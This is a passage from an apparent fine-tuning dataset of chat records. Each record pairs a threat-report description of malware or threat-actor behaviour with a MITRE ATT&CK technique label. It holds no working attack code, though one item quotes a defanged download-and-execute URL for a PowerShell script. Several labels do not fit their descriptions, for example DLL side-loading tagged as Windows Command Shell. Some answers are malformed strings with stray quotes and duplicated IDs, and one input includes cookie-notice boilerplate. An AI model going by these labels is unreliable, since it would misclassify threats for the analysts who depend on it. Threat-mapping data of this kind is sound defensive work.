- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can generate shellcode outputs that execute via VBScript."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA453, an Iranian-state aligned actor, masqueraded as British scholars to covertly target individuals of intelligence interest to the Iranian government in what Proofpoint has dubbed Operation SpoofedScholars. The email conversations were benign until TA453 provided a link to a compromised website hosting a credential harvesting page. The use of a legitimate but actor-compromised website is an increase in sophistication compared to TA453’s historical Tactics, Techniques, and Procedures of using actor-controlled credential phishing websites. Proofpoint has worked with the appropriate authorities to conduct victim notification"
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ecipekac can abuse the legitimate application policytool.exe to load a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has collected the operating system version from the infected system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can retrieve passwords from messaging and mail client applications."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a collection of CodeExecution modules that enable by injecting code (DLL, shellcode) or reflectively loading a Windows PE file into a process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can report the file system type and disk space of a compromised host to C2."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the process is running with Low integrity, REvil terminates the current process and launches another instance of itself via ShellExecute using the \"runas\" command, which executes the new instance with administrative rights"
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman has used the \"csc.exe\" tool to compile a C# executable."
- },
- {
- "role": "assistant",
- "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch has the ability to persist using scheduled tasks."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a command to clear system event logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu encodes files in Base64."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses port 8080 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware then grants itself debugging privileges by modifying its security token to add SeDebugPrivilege. This step is a prerequisite for the remainder of SUNSPOT’s execution, which involves reading other processes’ memory"
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer has attempted to install itself as a service to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has injected malicious code into a new svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used TeamViewer to preserve remote access in case control using the Cobalt Strike module was lost."
- },
- {
- "role": "assistant",
- "content": "T1108 - Redundant Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX executes DLL hijacking with benign applications such as ESET antivirus, Adobe Update etc. Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the tasklist to view running processes on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order)"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito deletes files using DeleteFileW API call."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The samples install HTTPBrowser at %APPDATA%/wdm.exe. Persistence is established via the HKCUSoftwareMicrosoftWindowsCurrentVersionRun key value for wdm set to the path of the executable. Previous samples have set persistence via Run key values for 360v"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used Google Drive for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can decrypt downloaded modules prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windigo has used a script to detect which Linux distribution and version is currently installed on the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "iKitten prompts the user for their credentials."
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia creates a RAR archive based on collected files on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can issue shell commands to download and execute additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT’s Java payload is encrypted with AES. Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist has the ability to upload files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used tools to detect sandbox or VMware services through identifying the presence of a debugger or related services."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has hosted malicious payloads on Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has created a user named `DefaultAccount` on compromised machines and assigned it to the Administrators and Remote Desktop Users groups."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can make tokens from known credentials."
- },
- {
- "role": "assistant",
- "content": "T1134.003 - Make and Impersonate Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY makes the most of using built-in Windows features – so-called “living off the land” – to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory. The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location \"HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\"."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can collect data on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names. RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cookie Notice . This website uses cookies to help personalize and improve your experience. By Continuing to use this site, you are consenting to the use of cookies. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials. Countries with targeted universities. Source: Secureworks) . After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again. Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources. CTU™ researchers were unable to confirm functionality of all identified spoofed pages because some of the domains were not accessible at the time of analysis. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity. A domain registered in May 2018 also contained subdomains spoofing university targets. These subdomains redirected visitors to spoofed login pages on other attacker-controlled domains"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FBI has high confidence that HIDDEN COBRA actors are using the IP addresses for further network exploitation.This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators, recommended mitigation techniques, and information on reporting incidents to the U.S"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1. By default, Excel will not launch the command prompt application, but will do so with the user’s consent via the following dialog box in Figure 3"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint has stored its malicious payload in the registry key \"HKLM\\SOFTWARE\\Microsoft\\DRM\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop has been packed to help avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 has used rundll32.exe to execute a loader."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We believe that the source of all these stolen certificates could be the same Winnti group. Either this group has close contacts with other Chinese hacker gangs, or it sells the certificates on the black market in China"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom TCP protocol for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most PowerShell scripts involved in LockBit 2.0 cases are Base64 encoded."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt has a command to download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "compromised McAfee ePO to move laterally by distributing malware as a software deployment task."
- },
- {
- "role": "assistant",
- "content": "T1072 - Software Deployment Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI)"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs the net view command"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, to the beginning of the BASE64 string a random BASE64 string with the length of 5 characters is added"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Avaddon ransomware executable is not packed. However, its strings appear Base64 encoded using a custom alphabet. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted via a previously from the ransomware binary imported key"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant downloads the backdoor payload via the BITS service."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some of BRONZE PRESIDENT's malware has persistence capabilities. For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose. Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been observed using SQL injection to gain access to systems."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FrameworkPOS can collect elements related to credit card data from process memory."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Web shells on publicly accessible Web servers to access victim networks."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can implant malicious code into a compromised device's firmware."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot checked if the compromised system is configured to use proxies."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
